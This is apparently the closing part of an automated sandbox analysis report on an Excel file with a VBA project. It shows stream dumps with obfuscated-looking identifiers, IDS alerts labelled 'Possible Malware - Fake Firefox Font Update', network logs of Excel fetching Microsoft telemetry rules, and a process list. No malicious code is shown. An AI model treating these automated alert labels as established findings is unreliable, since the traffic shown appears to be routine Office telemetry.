            Data Raw:93 4b 2a b2 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 02 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 05 00 00 7e 68 00 00 7f
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
            CLSID:
            File Type:data
            Stream Size:234
            Entropy:3.003457249217219
            Base64 Encoded:False
            Data ASCII:r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O 0 0 0 O 1 O O 0 1 1 0 O 1 1 0 1 . . . . . . . . b t t t t t t t t . . . . q . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . l e n g t h [ . . . . . . .
            Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 79 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff 03 00 00 09 71 07 00 00 00 00 00 00 a1 08 00 00 00 00 00 00 08 00 00 00 00 00 01 00 03 00 00 09 59 03 00 00 00 00 00 00 c9 08
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
            CLSID:
            File Type:data
            Stream Size:978
            Entropy:2.6372912031198905
            Base64 Encoded:False
            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . < . . . Y . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / . . . . . . . i . . . . . . . . . . . . . . . . . . . . . g . . . . . . . . . . . . . . . . . . . . . ' . . . . . . . g . . . .
            Data Raw:72 55 80 01 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 02 00 d9 03 00 00 00 00 00 00 09 08 00 00 00 00 00 00 31 08 00 00 00 00 00 00 ff ff ff ff c9 07 00 00 00 00 00 00 0a 00 14 00 3c 00 00 00 59 08 00 00 00 00 00 00 61 00 00 00 00 00 01 00 81 08
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
            CLSID:
            File Type:data
            Stream Size:1180
            Entropy:2.99083882941708
            Base64 Encoded:False
            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . $ . Q . . . . . . . . . . ` . . . . . . . . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . . ( . . . . . . . . . . . ` . . . . . . . . . . . . 0 , . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . & 0 ( . Q . . . . . . . . . . ` . . . . . . . . . . . . 0 ( . . . . . . . . . . . ` . . . . . . . . . . . . 0 ( . . . . . . . . . . . . ` . . . . . . .
            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 4c 00 00 00 04 00 24 00 11 02 00 00 00 00 02 00 00 00 03 60 00 00 ec 02 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 24 00 51 02 00 00 00 00 02 00 01 00 03 60 00 00 8d 02 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 24 00
            General
            Stream Path:_VBA_PROJECT_CUR/VBA/dir
            CLSID:
            File Type:MIPSEB MIPS-II ECOFF executable not stripped - version 72.9
            Stream Size:871
            Entropy:6.449176996802903
            Base64 Encoded:True
            Data ASCII:. c . . . . . . . . 0 J . . . H . . H . . . . . H . . . d . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . i ! . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s W O W 6 4 \\ . . e 2 . t l b # O . L E A u t o m a t i o n . 0 . . E O f f i c E O . f . i . c E . . . E 2 D F 8 D . 0 4 C - 5 B F A . - 1 0 1 B - B D E 5 E A A
            Data Raw:01 63 b3 80 01 00 04 00 00 00 01 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 a4 03 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 8a e0 a0 e0 69 21 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e
            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
            2025-03-11T07:12:46.182510+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973413.107.246.60443TCP
            2025-03-11T07:12:49.028320+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973513.107.246.60443TCP
            2025-03-11T07:12:50.784291+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973613.107.246.60443TCP
            TimestampSource PortDest PortSource IPDest IP
            Mar 11, 2025 07:12:43.388638020 CET49734443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:43.388683081 CET4434973413.107.246.60192.168.2.4
            Mar 11, 2025 07:12:43.388828039 CET49734443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:43.389139891 CET49734443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:43.389154911 CET4434973413.107.246.60192.168.2.4
            Mar 11, 2025 07:12:46.182426929 CET4434973413.107.246.60192.168.2.4
            Mar 11, 2025 07:12:46.182509899 CET49734443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:46.184053898 CET49734443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:46.184068918 CET4434973413.107.246.60192.168.2.4
            Mar 11, 2025 07:12:46.184451103 CET4434973413.107.246.60192.168.2.4
            Mar 11, 2025 07:12:46.192358017 CET49734443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:46.240320921 CET4434973413.107.246.60192.168.2.4
            Mar 11, 2025 07:12:46.842613935 CET4434973413.107.246.60192.168.2.4
            Mar 11, 2025 07:12:46.842669010 CET4434973413.107.246.60192.168.2.4
            Mar 11, 2025 07:12:46.842812061 CET49734443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:46.842847109 CET4434973413.107.246.60192.168.2.4
            Mar 11, 2025 07:12:46.842864037 CET49734443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:46.852227926 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:46.852276087 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:46.852345943 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:46.853209972 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:46.853265047 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:46.853324890 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:46.853435040 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:46.853447914 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:46.853554964 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:46.853569031 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.027770042 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.028320074 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:49.028383017 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.029356003 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:49.029371023 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.531567097 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.531583071 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.531629086 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.531678915 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:49.531733990 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:49.532397032 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:49.532443047 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:49.532469988 CET49735443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:49.532486916 CET4434973513.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.781712055 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.784219027 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.784291029 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:50.784373045 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.785867929 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.785933971 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:50.785958052 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.787384033 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.787442923 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:50.787456989 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:50.793490887 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:50.793525934 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:51.230350018 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:51.231861115 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:51.231905937 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:51.643471003 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:51.687755108 CET49736443192.168.2.413.107.246.60
            Mar 11, 2025 07:12:51.774450064 CET4434973613.107.246.60192.168.2.4
            Mar 11, 2025 07:12:51.828399897 CET49736443192.168.2.413.107.246.60
            TimestampSource PortDest PortSource IPDest IP
            Mar 11, 2025 07:12:43.379873037 CET5617953192.168.2.41.1.1.1
            Mar 11, 2025 07:12:43.387593985 CET53561791.1.1.1192.168.2.4
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Mar 11, 2025 07:12:43.379873037 CET192.168.2.41.1.1.10x8d5aStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Mar 11, 2025 07:11:41.670691013 CET1.1.1.1192.168.2.40x267aNo error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
            Mar 11, 2025 07:11:41.670691013 CET1.1.1.1192.168.2.40x267aNo error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
            Mar 11, 2025 07:11:41.670691013 CET1.1.1.1192.168.2.40x267aNo error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
            Mar 11, 2025 07:12:43.387593985 CET1.1.1.1192.168.2.40x8d5aNo error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
            Mar 11, 2025 07:12:43.387593985 CET1.1.1.1192.168.2.40x8d5aNo error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
            Mar 11, 2025 07:12:43.387593985 CET1.1.1.1192.168.2.40x8d5aNo error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
            Mar 11, 2025 07:12:43.387593985 CET1.1.1.1192.168.2.40x8d5aNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
            Mar 11, 2025 07:12:43.387593985 CET1.1.1.1192.168.2.40x8d5aNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
            • otelrules.svc.static.microsoft
            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
            Mar 11, 2025 07:12:50.785958052 CET13.107.246.60443192.168.2.449736CN=otelrules.svc.static.microsoft, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USTue Feb 04 01:57:58 CET 2025 Thu Jun 08 02:00:00 CEST 2023 Thu Aug 01 14:00:00 CEST 2013Sun Aug 03 02:57:58 CEST 2025 Wed Aug 26 01:59:59 CEST 2026 Fri Jan 15 13:00:00 CET 2038771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0a0e9f5d64349fb13191bc781f81f42e1
            CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Jun 08 02:00:00 CEST 2023Wed Aug 26 01:59:59 CEST 2026
            CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Aug 01 14:00:00 CEST 2013Fri Jan 15 13:00:00 CET 2038
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.44973413.107.246.604438120C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            TimestampBytes transferredDirectionData
            2025-03-11 06:12:46 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
            Host: otelrules.svc.static.microsoft


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.44973513.107.246.604438120C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            TimestampBytes transferredDirectionData
            2025-03-11 06:12:49 UTC214OUTGET /rules/rule120600v5s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
            Host: otelrules.svc.static.microsoft
            2025-03-11 06:12:49 UTC494INHTTP/1.1 200 OK
            Date: Tue, 11 Mar 2025 06:12:49 GMT
            Content-Type: text/xml
            Content-Length: 3870
            Connection: close
            Vary: Accept-Encoding
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 19 Nov 2024 13:00:34 GMT
            ETag: "0x8DD089A27B58D5A"
            x-ms-request-id: 5b07f980-001e-0028-5100-92c49f000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20250311T061249Z-178d6db7786vmv9phC1MIA10r400000005xg00000000ev6f
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2025-03-11 06:12:49 UTC3870INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="5" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:02:11:33
            Start date:11/03/2025
            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
            Imagebase:0x320000
            File size:53'161'064 bytes
            MD5 hash:4A871771235598812032C822E6F68F19
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:17
            Start time:02:12:38
            Start date:11/03/2025
            Path:C:\Windows\splwow64.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\splwow64.exe 12288
            Imagebase:0x7ff7a4280000
            File size:163'840 bytes
            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            No disassembly